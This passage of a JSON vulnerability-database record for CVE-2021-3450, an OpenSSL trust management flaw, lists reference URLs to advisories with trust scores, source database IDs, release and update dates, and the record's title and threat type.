"url": "https://www.auscert.org.au/bulletins/esb-2021.3141"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6479351"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-rational-clearquest-cve-2021-3449-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031104"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-20305"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20305"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-14502"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25678"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-25678"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3139"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3114"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3528"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3114"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8286"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-28196"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27618"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-3842"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-13776"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-24977"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8231"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8231"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24977"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8285"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28196"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29362"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-2708"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29363"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8284"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29361"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10356"
},
{
"trust": 0.1,
"url": "https://www.openssl.org/support/contracts.html"
},
{
"trust": 0.1,
"url": "https://www.openssl.org/policies/secpolicy.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7774"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7774"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7608"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26289"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26160"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7608"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8565"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26160"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8565"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_openshift_container_s"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26289"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2479"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23240"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9951"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23239"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36242"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13012"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25659"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13584"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36242"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13584"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25659"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9983"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13012"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2130"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8284"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27219"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/windows_containers/window"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8285"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8286"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1168"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29529"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28851"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29529"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28500"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3347"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28374"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23337"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28851"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27364"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26708"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27365"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0466"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27152"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23337"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28852"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28500"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27152"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21322"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27365"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0466"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27364"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28374"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9802"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30762"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9895"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3899"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8819"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3867"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9893"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8808"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3900"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30761"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3537"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9805"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8820"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9850"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8811"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0055"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9803"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2014-3577"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3577"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3885"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15503"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10018"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25660"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8844"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1730"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3864"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21684"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14391"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8811"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3901"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39226"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8808"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3895"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11793"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0532"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8816"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8771"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3897"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9952"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3517"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3868"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8846"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25677"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3115"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless_applications/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3115"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=securitypatches\u0026version=2.4.37"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "PACKETSTORM",
"id": "169659"
},
{
"db": "PACKETSTORM",
"id": "162699"
},
{
"db": "PACKETSTORM",
"id": "163209"
},
{
"db": "PACKETSTORM",
"id": "163257"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162151"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-388430",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169659",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162699",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163209",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163257",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162172",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162151",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166279",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162307",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162197",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-3450",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-388430",
"ident": null
},
{
"date": "2021-03-25T12:12:12",
"db": "PACKETSTORM",
"id": "169659",
"ident": null
},
{
"date": "2021-05-19T14:22:15",
"db": "PACKETSTORM",
"id": "162699",
"ident": null
},
{
"date": "2021-06-17T18:34:10",
"db": "PACKETSTORM",
"id": "163209",
"ident": null
},
{
"date": "2021-06-23T15:44:15",
"db": "PACKETSTORM",
"id": "163257",
"ident": null
},
{
"date": "2021-04-14T16:31:48",
"db": "PACKETSTORM",
"id": "162172",
"ident": null
},
{
"date": "2021-04-13T15:38:30",
"db": "PACKETSTORM",
"id": "162151",
"ident": null
},
{
"date": "2022-03-11T16:38:38",
"db": "PACKETSTORM",
"id": "166279",
"ident": null
},
{
"date": "2021-04-23T15:10:34",
"db": "PACKETSTORM",
"id": "162307",
"ident": null
},
{
"date": "2021-04-15T13:50:04",
"db": "PACKETSTORM",
"id": "162197",
"ident": null
},
{
"date": "2021-03-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-1456",
"ident": null
},
{
"date": "2021-03-25T15:15:13.560000",
"db": "NVD",
"id": "CVE-2021-3450",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-28T00:00:00",
"db": "VULHUB",
"id": "VHN-388430",
"ident": null
},
{
"date": "2022-07-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-1456",
"ident": null
},
{
"date": "2024-11-21T06:21:33.633000",
"db": "NVD",
"id": "CVE-2021-3450",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "OpenSSL Trust Management Issue Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
],
"trust": 0.6
}
}
VAR-201711-0007
